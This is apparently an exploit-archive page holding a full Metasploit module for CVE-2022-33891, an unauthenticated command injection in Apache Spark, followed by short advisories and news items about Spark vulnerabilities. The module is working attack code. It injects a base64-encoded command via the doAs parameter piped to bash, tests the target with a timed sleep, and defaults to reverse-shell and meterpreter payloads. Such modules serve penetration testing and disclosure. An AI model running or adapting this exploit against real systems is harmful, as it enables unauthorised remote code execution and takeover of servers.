Headline
Apache Spark Unauthenticated Command Injection
This Metasploit module exploits an unauthenticated command injection vulnerability in Apache Spark. Successful exploitation results in remote code execution under the context of the Spark application user. The command injection occurs because Spark checks the group membership of the user passed in the ?doAs parameter by using a raw Linux command. It is triggered by a non-default setting called spark.acls.enable. This configuration setting spark.acls.enable should be set true in the Spark configuration to make the application vulnerable for this attack. Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1 are affected by this vulnerability.
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'rex/stopwatch'class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Apache Spark Unauthenticated Command Injection RCE', 'Description' => %q{ This module exploits an unauthenticated command injection vulnerability in Apache Spark. Successful exploitation results in remote code execution under the context of the Spark application user. The command injection occurs because Spark checks the group membership of the user passed in the ?doAs parameter by using a raw Linux command. It is triggered by a non-default setting called spark.acls.enable. This configuration setting spark.acls.enable should be set true in the Spark configuration to make the application vulnerable for this attack. Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1 are affected by this vulnerability. }, 'License' => MSF_LICENSE, 'Author' => [ 'Kostya Kortchinsky', # Security researcher and discovery of the vulnerability 'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Author & Metasploit module ], 'References' => [ ['URL', 'https://lists.apache.org/thread/p847l3kopoo5bjtmxrcwk21xp6tjxqlc'], # Disclosure ['URL', 'https://attackerkb.com/topics/5FyKBES4BL/cve-2022-33891'], # Analysis ['CVE', '2022-33891'] ], 'DefaultOptions' => { 'SSL' => false, 'WfsDelay' => 5 }, 'Platform' => %w[unix linux], 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'Targets' => [ [ 'Unix (In-Memory)', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :in_memory, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_python' } } ], [ 'Linux Dropper', { 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :dropper, 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } } ] ], 'CmdStagerFlavor' => ['printf', 'curl'], 'DefaultTarget' => 0, 'Privileged' => false, 'DisclosureDate' => '2022-07-18', 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS] } ) ) register_options( [ Opt::RPORT(8080), OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']) ] ) end def execute_command(cmd, _opts = {}) b64 = Rex::Text.encode_base64(cmd) post_data = "doAs=\`echo #{b64} | base64 -d | bash\`" return send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/'), 'data' => post_data }) rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Errno::ETIMEDOUT => e elog("A communication error occurred: #{e.message}", error: e) end def check print_status("Checking if #{peer} can be exploited!") res = execute_command("echo #{Rex::Text.rand_text_alpha_lower(8..12)}") return CheckCode::Unknown('Did not receive a response from target.') unless res if res.code != 403 return CheckCode::Safe('Target did not respond with a 403 response.') end sleep_time = rand(5..10) print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.") res, elapsed_time = Rex::Stopwatch.elapsed_time do execute_command("sleep #{sleep_time}") end print_status("Elapsed time: #{elapsed_time} seconds.") unless res && elapsed_time >= sleep_time return CheckCode::Safe('Failed to test command injection.') end CheckCode::Vulnerable('Successfully tested command injection.') end def exploit print_status('Exploiting...') case target['Type'] when :in_memory execute_command(payload.encoded) when :dropper execute_cmdstager(linemax: 1024) # set an appropriate :linemax dependent upon available space end endendRelated news
** UNSUPPORTED WHEN ASSIGNED ** The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as. This issue was disclosed earlier as CVE-2022-33891, but incorrectly claimed version 3.1.3 (which has since gone EOL) would not be affected. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. Users are recommended to upgrade to a supported version of Apache Spark, such as version 3.4.0.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added three security flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. The list of vulnerabilities is below - CVE-2022-35914 (CVSS score: 9.8) - Teclib GLPI Remote Code Execution Vulnerability CVE-2022-33891 (CVSS score: 8.8) - Apache Spark Command Injection Vulnerability
The Zerobot DDoS botnet has received substantial updates that expand on its ability to target more internet-connected devices and scale its network. Microsoft Threat Intelligence Center (MSTIC) is tracking the ongoing threat under the moniker DEV-1061, its designation for unknown, emerging, or developing activity clusters. Zerobot, first documented by Fortinet FortiGuard Labs earlier this month,
The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as. This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.
Spark's Apache Maven-based build includes a convenience script, 'build/mvn', that downloads and runs a zinc server to speed up compilation. It has been included in release branches since 1.3.x, up to and including master. This server will accept connections from external hosts by default. A specially-crafted request to the zinc server could cause it to reveal information in files readable to the developer account running the build. Note that this issue does not affect end users of Spark, only developers building Spark from source code.
From version 1.3.0 onward, Apache Spark's standalone master exposes a REST API for job submission, in addition to the submission mechanism used by spark-submit. In standalone, the config property 'spark.authenticate.secret' establishes a shared secret for authenticating requests to submit jobs via spark-submit. However, the REST API does not use this or any other authentication mechanism, and this is not adequately documented. In this case, a user would be able to run a driver program without authenticating, but not launch executors, using the REST API. This REST API is also used by Mesos, when set up to run in cluster mode (i.e., when also running MesosClusterDispatcher), for job submission. Future versions of Spark will improve documentation on these points, and prohibit setting 'spark.authenticate.secret' when running the REST APIs, to make this clear. Future versions will also disable the REST API by default in the standalone master by changing the default value of 'spark.master.re...